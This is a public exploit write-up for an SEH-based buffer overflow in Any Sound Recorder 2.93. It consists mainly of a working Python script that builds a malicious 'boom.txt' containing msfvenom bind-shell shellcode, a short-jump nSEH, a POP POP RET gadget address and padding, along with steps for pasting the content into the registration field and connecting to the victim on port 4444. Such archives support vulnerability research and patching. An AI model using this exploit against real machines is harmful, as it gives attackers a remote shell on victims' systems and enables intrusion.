# Exploit Title: Any Sound Recorder 2.93 - Buffer Overflow (SEH) # Exploit Author: Abdullah Alic # Discovery Date: 2018-10-16 # Homepage: http://www.any-sound-recorder.com # Software Link: http://www.any-sound-recorder.com/anysoundrecorder.exe # Version: 2.93 # Tested on: Windows XP Professional sp3 (ENG) # Steps to Reproduce: Run the python exploit script, it will create a new file # with the name "boom.txt". Copy the content of the "boom.txt". # Start Any Sound Recorder 2.93 click "Enter Key Code" Paste the content into field "User Name" click "Register" # Connect victim machine on port 4444 #!/usr/bin/python #Payload size: 355 bytes #msfvenom -p windows/shell_bind_tcp -b "\x00\x0a\x0d" -f python buf = "" buf += "\xb8\x67\x21\x25\x53\xdd\xc0\xd9\x74\x24\xf4\x5b\x31" buf += "\xc9\xb1\x53\x31\x43\x12\x03\x43\x12\x83\x8c\xdd\xc7" buf += "\xa6\xae\xf6\x8a\x49\x4e\x07\xeb\xc0\xab\x36\x2b\xb6" buf += "\xb8\x69\x9b\xbc\xec\x85\x50\x90\x04\x1d\x14\x3d\x2b" buf += "\x96\x93\x1b\x02\x27\x8f\x58\x05\xab\xd2\x8c\xe5\x92" buf += "\x1c\xc1\xe4\xd3\x41\x28\xb4\x8c\x0e\x9f\x28\xb8\x5b" buf += "\x1c\xc3\xf2\x4a\x24\x30\x42\x6c\x05\xe7\xd8\x37\x85" buf += "\x06\x0c\x4c\x8c\x10\x51\x69\x46\xab\xa1\x05\x59\x7d" buf += "\xf8\xe6\xf6\x40\x34\x15\x06\x85\xf3\xc6\x7d\xff\x07" buf += "\x7a\x86\xc4\x7a\xa0\x03\xde\xdd\x23\xb3\x3a\xdf\xe0" buf += "\x22\xc9\xd3\x4d\x20\x95\xf7\x50\xe5\xae\x0c\xd8\x08" buf += "\x60\x85\x9a\x2e\xa4\xcd\x79\x4e\xfd\xab\x2c\x6f\x1d" buf += "\x14\x90\xd5\x56\xb9\xc5\x67\x35\xd6\x2a\x4a\xc5\x26" buf += "\x25\xdd\xb6\x14\xea\x75\x50\x15\x63\x50\xa7\x5a\x5e" buf += "\x24\x37\xa5\x61\x55\x1e\x62\x35\x05\x08\x43\x36\xce" buf += "\xc8\x6c\xe3\x7b\xc0\xcb\x5c\x9e\x2d\xab\x0c\x1e\x9d" buf += "\x44\x47\x91\xc2\x75\x68\x7b\x6b\x1d\x95\x84\x82\x82" buf += "\x10\x62\xce\x2a\x75\x3c\x66\x89\xa2\xf5\x11\xf2\x80" buf += "\xad\xb5\xbb\xc2\x6a\xba\x3b\xc1\xdc\x2c\xb0\x06\xd9" buf += "\x4d\xc7\x02\x49\x1a\x50\xd8\x18\x69\xc0\xdd\x30\x19" buf += "\x61\x4f\xdf\xd9\xec\x6c\x48\x8e\xb9\x43\x81\x5a\x54" buf += "\xfd\x3b\x78\xa5\x9b\x04\x38\x72\x58\x8a\xc1\xf7\xe4" buf += "\xa8\xd1\xc1\xe5\xf4\x85\x9d\xb3\xa2\x73\x58\x6a\x05" buf += "\x2d\x32\xc1\xcf\xb9\xc3\x29\xd0\xbf\xcb\x67\xa6\x5f" buf += "\x7d\xde\xff\x60\xb2\xb6\xf7\x19\xae\x26\xf7\xf0\x6a" buf += "\x56\xb2\x58\xda\xff\x1b\x09\x5e\x62\x9c\xe4\x9d\x9b" buf += "\x1f\x0c\x5e\x58\x3f\x65\x5b\x24\x87\x96\x11\x35\x62" buf += "\x98\x86\x36\xa7" junk = 10000 nseh= "\xeb\x06\x90\x90" # SHORT JMP 6 bytes seh= "\x35\x2f\xd1\x72" # 0x72d12f35 : pop ebx # pop ebp # ret 0x0c FROM msacm32.drv buffer = "\x90" * 900 + nseh + seh + buf + "\x90" * (junk-len(buf)) payload = buffer #badchars \x00 \x0a \x0d try: f=open("boom.txt","w") print "[+] Creating %s bytes payload..." %len(payload) f.write(payload) f.close() print "[+] File created!" except: print "File cannot be created"